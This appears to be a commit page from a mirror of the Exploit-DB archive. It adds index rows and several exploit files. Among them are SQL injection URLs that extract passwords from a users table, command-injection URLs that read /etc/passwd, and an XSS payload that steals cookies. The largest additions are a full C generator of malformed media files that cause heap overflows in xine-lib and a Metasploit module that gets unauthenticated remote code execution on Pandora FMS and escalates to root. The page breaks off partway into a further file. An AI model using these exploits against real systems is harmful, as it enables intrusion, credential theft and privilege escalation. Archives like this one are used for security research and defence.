bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_08_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-08 04:27:41 +00:00
parent 9f14dc1cba
commit b702913b41
63 changed files with 1665 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

62
files.csv
View file

@ -28195,6 +28195,7 @@ id,file,description,date,author,platform,type,port
31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 (.m3u) - SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
@ -28227,6 +28228,7 @@ id,file,description,date,author,platform,type,port
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80
@ -28258,3 +28260,63 @@ id,file,description,date,author,platform,type,port
31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80
31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0
31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0
31462,platforms/linux/remote/31462.c,"xine-lib Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0
31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0
31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0
31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0
31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0
31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0
31469,platforms/php/webapps/31469.txt,"ooComments 1.0 classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
31470,platforms/php/webapps/31470.txt,"ooComments 1.0 classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0
31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0
31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0
31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0
31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0
31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0
31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0
31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0
31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0
31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80
31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023

Can't render this file because it is too large.

9
platforms/asp/webapps/31463.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28376/info
Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users

11
platforms/cgi/webapps/31466.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28393/info
Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
These issues affect Webutil 2.3 and 2.7.
http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd

9
platforms/hardware/dos/31478.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28414/info
Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession.
Attackers can exploit this issue to deny access to the device's control center for legitimate users. Reports indicate that this issue is exploitable only via computers on the same LAN as the device.
Linksys SPA-2102 Phone Adapter running firmware 3.3.6 is vulnerable; other versions may also be affected.
ping -l 65500 192.168.0.1

9
platforms/jsp/webapps/31475.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28411/info
Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
OpenCms 7.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E

375
platforms/linux/remote/31462.c Executable file
View file

@ -0,0 +1,375 @@
source: http://www.securityfocus.com/bid/28370/info
The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
These issues affect xine-lib 1.1.11; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef int64_t i64;
typedef uint64_t u64;
#define VER "0.1"
#define BUFFSZ 0xffff
#define BE_FOURCC( ch0, ch1, ch2, ch3 ) \
( (uint32_t)(unsigned char)(ch3) | \
( (uint32_t)(unsigned char)(ch2) << 8 ) | \
( (uint32_t)(unsigned char)(ch1) << 16 ) | \
( (uint32_t)(unsigned char)(ch0) << 24 ) )
#define FLV_FLAG_HAS_VIDEO 0x01
#define FLV_FLAG_HAS_AUDIO 0x04
#define FLV_TAG_TYPE_SCRIPT 0x12
#define FLV_DATA_TYPE_NUMBER 0x00
#define FLV_DATA_TYPE_OBJECT 0x03
#define FLV_DATA_TYPE_ENDOBJECT 0x09
#define FLV_DATA_TYPE_ARRAY 0x0a
#define MOOV_ATOM BE_FOURCC('m', 'o', 'o', 'v')
#define RMRA_ATOM BE_FOURCC('r', 'm', 'r', 'a')
#define RDRF_ATOM BE_FOURCC('r', 'd', 'r', 'f')
#define RMF_TAG BE_FOURCC('.', 'R', 'M', 'F')
#define PROP_TAG BE_FOURCC('P', 'R', 'O', 'P')
#define MDPR_TAG BE_FOURCC('M', 'D', 'P', 'R')
#define DATA_TAG BE_FOURCC('D', 'A', 'T', 'A')
#define INDX_TAG BE_FOURCC('I', 'N', 'D', 'X')
#define VIDO_TAG BE_FOURCC('V', 'I', 'D', 'O')
#define DATA_CHUNK_HEADER_SIZE 10
#define FORM_TAG BE_FOURCC('F', 'O', 'R', 'M')
#define MOVE_TAG BE_FOURCC('M', 'O', 'V', 'E')
#define PC_TAG BE_FOURCC('_', 'P', 'C', '_')
#define PALT_TAG BE_FOURCC('P', 'A', 'L', 'T')
#define PALETTE_SIZE 256
#define PALETTE_CHUNK_SIZE (PALETTE_SIZE * 3)
#define EBML_ID_EBML 0x1A45DFA3
#define EBML_ID_DOCTYPE 0x4282
#define GST_EBML_SIZE_UNKNOWN 0x00ffffffffffffffULL
#define GST_EBML_ID_VOID 0xEC
#define FILM_TAG BE_FOURCC('F', 'I', 'L', 'M')
#define STAB_TAG BE_FOURCC('S', 'T', 'A', 'B')
int gst_ebml_write_element_id(u8 *data, u32 id); // from Gstreamer
int gst_ebml_write_element_size(u8 *data, i64 size); // from Gstreamer
int putcc(u8 *data, int chr, int len);
int putss(u8 *data, u8 *str);
int putxb(u8 *data, u64 num, int bits);
int putxi(u8 *data, u64 num, int bits);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
int i,
attack;
u8 *buff,
*fname,
*psize,
*p;
setbuf(stdout, NULL);
fputs("\n"
"xine-lib <= 1.1.11 multiple heap overflows "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = heap overflow in demux_flv (file.FLV)\n"
" 2 = heap overflow in demux_qt (file.MOV)\n"
" 3 = heap overflow in demux_real (file.RM)\n"
" 4 = heap overflow in demux_wc3movie (file.MVE)\n"
" 5 = heap overflow in ebml.c (file.MKV)\n"
" 6 = heap overflow in demux_film.c (file.CAK)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
buff = malloc(BUFFSZ);
if(!buff) std_err();
p = buff;
if(attack == 1) {
p += putss(p, "FLV\x01");
*p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO;
p += putxb(p, 9, 32);
p += putxb(p, 0, 32);
p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8); // tag_type
psize = p; p += 3;
p += putxb(p, 0, 32); // pts
p += putxb(p, 0, 24);
p += putxb(p, FLV_DATA_TYPE_OBJECT, 8);
p += putxb(p, 13, 16);
p += putss(p, "filepositions");
p += putxb(p, FLV_DATA_TYPE_ARRAY, 8);
p += putxb(p, 0x20000000, 32);
for(i = 0; i < 4000; i++) {
p += putxb(p, FLV_DATA_TYPE_NUMBER, 8);
p += putxb(p, 0x4141414141414141ULL, 64);
}
p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8); // useless
putxb(psize, p - (psize + 3 + 4 + 3), 24);
} else if(attack == 2) {
p += putxb(p, 8000 - 24, 32);
p += putxb(p, MOOV_ATOM, 32);
p += putxb(p, 8000 - 16, 32);
p += putxb(p, RMRA_ATOM, 32);
p += putxb(p, 8000 - 8, 32);
p += putxb(p, RDRF_ATOM, 32);
p += putxb(p, 0, 32); // i + 4
p += putxb(p, 0, 32); // i + 8
p += putxb(p, 0xffffffff, 32); // i + 12
p += putcc(p, 'A', 8000 - 12);
} else if(attack == 3) {
p += putxb(p, RMF_TAG, 32);
p += putxb(p, 8, 32);
p += putxb(p, MDPR_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 1, 16); // mdpr->stream_number
p += putxb(p, 0, 32); // mdpr->max_bit_rate
p += putxb(p, 0, 32); // mdpr->avg_bit_rate
p += putxb(p, 0, 32); // mdpr->max_packet_size
p += putxb(p, 0, 32); // mdpr->avg_packet_size
p += putxb(p, 0, 32); // mdpr->start_time
p += putxb(p, 0, 32); // mdpr->preroll
p += putxb(p, 0, 32); // mdpr->duration
p += putxb(p, 0, 8); // mdpr->stream_name_size
// mdpr->stream_name
p += putxb(p, 0, 8); //
mdpr->mime_type_size=data[33+mdpr->stream_name_size];
// mdpr->mime_type
p += putxb(p, 8, 32); // mdpr->type_specific_len
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, PROP_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32);
p += putxb(p, 1, 32); // avg_bitrate
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32); // this->duration
p += putxb(p, 0, 32);
p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32);
// this->index_start
p += putxb(p, 0, 32); // this->data_start
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, DATA_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32); //
this->current_data_chunk_packet_count
p += putxb(p, 0, 32); //
this->next_data_chunk_offset
p += putxb(p, INDX_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 16);
p += putxb(p, 0x15555556, 32); // entries
p += putxb(p, 1, 16); // stream_num
p += putxb(p, 0, 32); // next_index_chunk
for(i = 0; i < 4000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) + 4, 32);
} else if(attack == 4) {
p += putxb(p, FORM_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, MOVE_TAG, 32);
p += putxb(p, PC_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxi(p, 0x555556, 32); // this->number_of_shots
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
for(i = 0; i < 80; i++) {
p += putxb(p, PALT_TAG, 32);
p += putxb(p, PALETTE_CHUNK_SIZE, 32);
p += putcc(p, 13, PALETTE_CHUNK_SIZE); // -> 0x48
}
} else if(attack == 5) {
p += gst_ebml_write_element_id(p, EBML_ID_EBML);
p += gst_ebml_write_element_size(p, 8000); // not perfect
p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE);
p += gst_ebml_write_element_size(p, 0xffffffff);
p += putcc(p, 'A', 8000);
} else if(attack == 6) {
p += putss(p, "FILM");
p += 4;
p += putss(p, "1.09");
p += putxb(p, 0, 32);
p += putxb(p, STAB_TAG, 32);
psize = p; p += 4;
p += putxb(p, 44100, 32);
p += putxb(p, 0x71c71c8, 32); // sizeof(film_sample_t) is
36 bytes
for(i = 0; i < 3000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) - 40, 32);
putxb(buff + 4, (p - psize) - 8 - 16, 32);
} else {
printf("\nError: wrong attack number (%d)\n", attack);
exit(1);
}
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
printf("- write %u bytes\n", p - buff);
fwrite(buff, 1, p - buff, fd);
fclose(fd);
printf("- done\n");
return(0);
}
int gst_ebml_write_element_id(u8 *data, u32 id) { // from Gstreamer
int ret, bytes = 4, mask = 0x10;
while (!(id & (mask << ((bytes - 1) * 8))) && bytes > 0) {
mask <<= 1;
bytes--;
}
if (bytes == 0) {
bytes = 1;
id = GST_EBML_ID_VOID;
}
ret = bytes;
while (bytes--) {
data[bytes] = id & 0xff;
id >>= 8;
}
return(ret);
}
int gst_ebml_write_element_size(u8 *data, i64 size) { // from Gstreamer
int ret, bytes = 1, mask = 0x80;
if (size != GST_EBML_SIZE_UNKNOWN) {
while ((size >> ((bytes - 1) * 8)) >= (mask - 1) && bytes <= 8) {
mask >>= 1;
bytes++;
}
if (bytes > 8) {
mask = 0x01;
bytes = 8;
size = GST_EBML_SIZE_UNKNOWN;
}
} else {
mask = 0x01;
bytes = 8;
}
ret = bytes;
while (bytes-- > 0) {
data[bytes] = size & 0xff;
size >>= 8;
if (!bytes)
*data |= mask;
}
return(ret);
}
int putcc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}
int putss(u8 *data, u8 *str) {
int len;
len = strlen(str);
memcpy(data, str, len);
return(len);
}
int putxb(u8 *data, u64 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
int putxi(u8 *data, u64 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
void std_err(void) {
perror("\nError");
exit(1);
}

113
platforms/linux/remote/31518.rb Executable file
View file

@ -0,0 +1,113 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Pandora FMS Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.
It will leverage an unauthenticated command injection in the Anyterm service on
port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1
the user "artica" is not assigned a password by default, which makes it possible to su
to this user from the "pandora" user. The "artica" user has access to sudo without a
password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0
and lower force a password for the "artica" user during installation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
],
'Payload' =>
{
'BadChars' => "",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Pandora 5.0RC1', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jan 29 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8023),
OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
], self.class)
end
def on_new_session(client)
print_status("#{peer} - Trying to escalate privileges to root")
[
# ignore SIGHUP so the server doesn't kill our root shell
"trap '' HUP",
# Spawn a pty for su/sudo
"python -c 'import pty;pty.spawn(\"/bin/sh\")'",
# Su to the passwordless "artica" account
"su - artica",
# The "artica" use has sudo rights without the need for a
# password, thus gain root priveleges
"sudo -s",
].each do |command|
vprint_status(command)
client.shell_write(command + "\n")
end
super
end
def check
# Check version
print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "anyterm.html")
})
if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/anyterm-module"),
'vars_post' => {
'a' => "open",
'p' => "`#{payload.encoded}`"
}
})
if !res || res.code != 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
end
end
end

9
platforms/multiple/dos/31477.txt Executable file
View file

@ -0,0 +1,9 @@
